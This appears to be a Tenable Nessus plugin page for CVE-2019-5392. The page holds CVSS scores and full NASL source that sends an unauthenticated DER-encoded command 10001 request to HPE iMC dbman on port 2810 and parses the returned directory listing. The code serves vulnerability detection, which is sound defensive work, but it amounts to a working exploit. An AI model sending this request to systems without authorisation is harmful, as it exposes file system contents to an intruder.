CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
EPSS
Percentile
78.0%
The HPE Intelligent Management Center (iMC) dbman process running on the remote host is affected by an information disclosure vulnerability. An unauthenticated, remote attacker can exploit this, via a command 10001 request, to view the contents of arbitrary directories under the security context of the SYSTEM or root user.
Note that the HPE iMC dbman process running on the remote host is reportedly affected by additional vulnerabilities; however, this plugin has not tested for these.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(118038);
script_version("1.8");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2019-5392");
script_xref(name:"TRA", value:"TRA-2018-28");
script_xref(name:"HP", value:"HPESBHF03930");
script_name(english:"HPE Intelligent Management Center dbman Command 10001 Information Disclosure");
script_set_attribute(attribute:"synopsis", value:
"A database backup and restoration tool running on the remote host is
affected by an information disclosure vulnerability.");
script_set_attribute(attribute:"description", value:
"The HPE Intelligent Management Center (iMC) dbman process running
on the remote host is affected by an information disclosure
vulnerability. An unauthenticated, remote attacker can
exploit this, via a command 10001 request, to view the contents of
arbitrary directories under the security context of the SYSTEM or
root user.
Note that the HPE iMC dbman process running on the remote host is
reportedly affected by additional vulnerabilities; however, this
plugin has not tested for these.");
# https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03930en_us
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f3575044");
script_set_attribute(attribute:"solution", value:
"Upgrade HPE iMC version to 7.3 E0703 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2019-5392");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value:"2018/10/10");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:intelligent_management_center");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"Misc.");
script_copyright(english:"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("hp_imc_dbman_detect.nbin");
script_require_ports("hpe_imc_dbman", 2810);
exit(0);
}
include('audit.inc');
include('byte_func.inc');
include('global_settings.inc');
include('misc_func.inc');
include('der_funcs.inc');
###
#
# Read a dbman response
#
# @param socket socket to read from
#
# @return ret['code'] - response code
# ret['data'] - response data
# NULL on error
#
###
function dbman_recv(socket)
{
local_var data, len, ret;
# Read 4-byte code
data = recv(socket:socket, length:4, min:4);
if(isnull(data)) return NULL;
ret['code'] = getdword(blob:data, pos:0);
# Read 4-byte msg len
data = recv(socket:socket, length:4, min:4);
if(isnull(data)) return NULL;
len = getdword(blob:data, pos:0);
# Dubious msg len
if(len > 0x10000) return NULL;
# Read msg body
data = NULL;
if(len)
{
data = recv(socket:socket, length:len, min:len);
if(isnull(data)) return NULL;
}
ret['data'] = data;
return ret;
}
###
#
# Parse command 10001 response
#
# @anonparam command 10001 response data
#
# @return parsed data
#
###
function get_dir_contents()
{
local_var data, ent, i, name, out, ret;
data = _FCT_ANON_ARGS[0];
# Parse the outer sequence
ret = der_parse_data(tag:0x30,data:data);
if(empty_or_null(ret)) return NULL;
# Parse the embedded sequence, which holds a list of
# directory entries
ret = der_parse_sequence(seq:ret,list:TRUE);
if(empty_or_null(ret)) return NULL;
# A directory should not have more than 1000 entries
if(ret[0] > 1000) return NULL;
out = NULL;
for (i = 1; i <= ret[0]; i++)
{
# Each directory entry is a sequence itself
ent = ret[i];
ent = der_parse_sequence(seq:ent,list:TRUE);
if(empty_or_null(ent)) return NULL;
# Each entry should have 3 elements
if(ent[0] != 3) return NULL;
# The 'name' element
name = der_parse_octet_string(string: ent[1]);
if(empty_or_null(name)) return NULL;
out += name + '\n';
}
return out;
}
port = get_service(svc:'hpe_imc_dbman', default:2810, exit_on_fail:TRUE);
soc = open_sock_tcp(port);
if (!soc) audit(AUDIT_PORT_CLOSED, port);
data = der_encode_int (i:1) + # flag
# Query the current directory of the dbman process
der_encode_octet_string(string:".");
opcode = 10001;
seq = der_encode (tag:0x30, data: data);
req = mkdword(opcode) + mkdword(strlen(seq)) + seq;
send(socket: soc, data: req);
res = dbman_recv(socket: soc);
close(soc);
if(! isnull(res) &&
! isnull(res['data']) &&
# The current directory should contain the dbman executable
'dbman' >< res['data'] &&
# Corretly extract the directory contents so that we can show
# to the user that the info disclosure vuln indeed exists.
!isnull((ret = get_dir_contents(res['data'])))
)
{
report =
'Nessus was able to get the contents of the current directory of the ' +
'dbman process: \n' +
'\n' +
ret;
security_report_v4(
port : port,
severity : SECURITY_WARNING,
extra : report
);
}
else
{
audit(AUDIT_HOST_NOT, 'affected');
}
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
EPSS
Percentile
78.0%